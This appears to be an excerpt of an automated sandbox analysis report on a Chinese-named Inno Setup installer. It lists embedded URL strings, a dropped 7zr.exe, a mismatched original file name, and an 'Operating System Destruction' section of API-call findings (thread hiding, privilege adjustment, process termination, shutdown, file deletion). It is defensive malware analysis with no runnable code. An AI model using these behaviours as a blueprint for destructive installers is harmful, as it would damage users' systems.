Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2043797965.00000000027A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2044209367.000000007F5CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000002.00000000.2046102925.0000000000CE1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000000.2069014707.0000000000CCD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2043797965.00000000027A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2044209367.000000007F5CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000002.00000000.2046102925.0000000000CE1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000000.2069014707.0000000000CCD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: 01 00 00 00 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C843886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C843886
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9C5120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6C9C5120
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C843C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C843C62
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C843D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C843D18
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C843D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C843D62
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C9C5D60
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C8439CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C8439CF
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C843A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C843A6A
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C841950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6C841950
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C844754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6C844754
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C8447546_2_6C844754
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C854A276_2_6C854A27
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9C18806_2_6C9C1880
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9C6A436_2_6C9C6A43
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA26CE06_2_6CA26CE0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA94DE06_2_6CA94DE0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA76D106_2_6CA76D10
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9F8EA16_2_6C9F8EA1
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA4AEEF6_2_6CA4AEEF
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA7EEF06_2_6CA7EEF0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA12EC96_2_6CA12EC9
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA448966_2_6CA44896
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA8C8D06_2_6CA8C8D0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA868206_2_6CA86820
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA6E8106_2_6CA6E810
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA948706_2_6CA94870
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA969996_2_6CA96999
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA8A9306_2_6CA8A930
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA769006_2_6CA76900
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA9A91A6_2_6CA9A91A
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9F89726_2_6C9F8972
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA889506_2_6CA88950
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA84AA06_2_6CA84AA0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA9AA006_2_6CA9AA00
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA50A526_2_6CA50A52
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA6AB906_2_6CA6AB90
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA8EBC06_2_6CA8EBC0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA00BCA6_2_6CA00BCA
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA10B666_2_6CA10B66
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA584AC6_2_6CA584AC
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA844896_2_6CA84489
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA7E4D06_2_6CA7E4D0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA725806_2_6CA72580
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA7C5806_2_6CA7C580
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA745D06_2_6CA745D0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA625216_2_6CA62521
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA885206_2_6CA88520
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA946C06_2_6CA946C0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA8E6006_2_6CA8E600
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA867A06_2_6CA867A0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9FC7CF6_2_6C9FC7CF
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA5C7F36_2_6CA5C7F3
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA967C06_2_6CA967C0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA7E0E06_2_6CA7E0E0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA700206_2_6CA70020
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA8C2A06_2_6CA8C2A0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA882006_2_6CA88200
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA95D906_2_6CA95D90
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA47D436_2_6CA47D43
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA73D506_2_6CA73D50
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA79E806_2_6CA79E80
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA51F116_2_6CA51F11
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA6589F6_2_6CA6589F
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA878C86_2_6CA878C8
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA799F06_2_6CA799F0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA71AA06_2_6CA71AA0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA6DAD06_2_6CA6DAD0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA6FA506_2_6CA6FA50
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA1540A6_2_6CA1540A
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA3F5EC6_2_6CA3F5EC
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA7F5C06_2_6CA7F5C0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA796E06_2_6CA796E0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA8F6406_2_6CA8F640
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA6B6506_2_6CA6B650
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA937C06_2_6CA937C0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA997006_2_6CA99700
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA130926_2_6CA13092
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA7F0506_2_6CA7F050
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA771F06_2_6CA771F0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA7D2806_2_6CA7D280
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA7D3806_2_6CA7D380
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA86AF06_2_6CA86AF0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA837506_2_6CA83750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007581EC10_2_007581EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007981C010_2_007981C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0078425010_2_00784250
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007A824010_2_007A8240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007AC3C010_2_007AC3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007A04C810_2_007A04C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0078865010_2_00788650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0078C95010_2_0078C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076094310_2_00760943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00788C2010_2_00788C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007A0E0010_2_007A0E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007A4EA010_2_007A4EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007710AC10_2_007710AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0079D08910_2_0079D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007A112010_2_007A1120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0078D1D010_2_0078D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007A91C010_2_007A91C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0079518010_2_00795180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007AD2C010_2_007AD2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007753F310_2_007753F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007153CF10_2_007153CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007AD47010_2_007AD470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007A54D010_2_007A54D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0075D49610_2_0075D496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0071157210_2_00711572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007A155010_2_007A1550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076965210_2_00769652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0079D6A010_2_0079D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0072976610_2_00729766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007197CA10_2_007197CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007AD9E010_2_007AD9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00711AA110_2_00711AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00795E8010_2_00795E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00795F8010_2_00795F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0072E00A10_2_0072E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007922E010_2_007922E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007B230010_2_007B2300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0077E49F10_2_0077E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007925F010_2_007925F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007866D010_2_007866D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0078A6A010_2_0078A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007AE99010_2_007AE990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00792A8010_2_00792A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076AB1110_2_0076AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00796CE010_2_00796CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007970D010_2_007970D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0077B12110_2_0077B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0078B18010_2_0078B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007A720010_2_007A7200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0073B3E410_2_0073B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007AF3C010_2_007AF3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0079F3A010_2_0079F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0079F42010_2_0079F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0078741010_2_00787410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007A353010_2_007A3530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007B351A10_2_007B351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0078F50010_2_0078F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007AF59910_2_007AF599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007B360110_2_007B3601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007A77C010_2_007A77C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0078379010_2_00783790
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0073F8E010_2_0073F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0078F91010_2_0078F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00797AF010_2_00797AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00763AEF10_2_00763AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0072BAC910_2_0072BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00797C5010_2_00797C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0072BC9210_2_0072BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0078FDF010_2_0078FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: String function: 6C9F9240 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: String function: 6CA96F10 appears 728 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 007128E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 007AFB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00711E40 appears 172 times
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2044209367.000000007F8CA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000000.2042094476.00000000009B9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2043797965.00000000028BE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeBinary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe
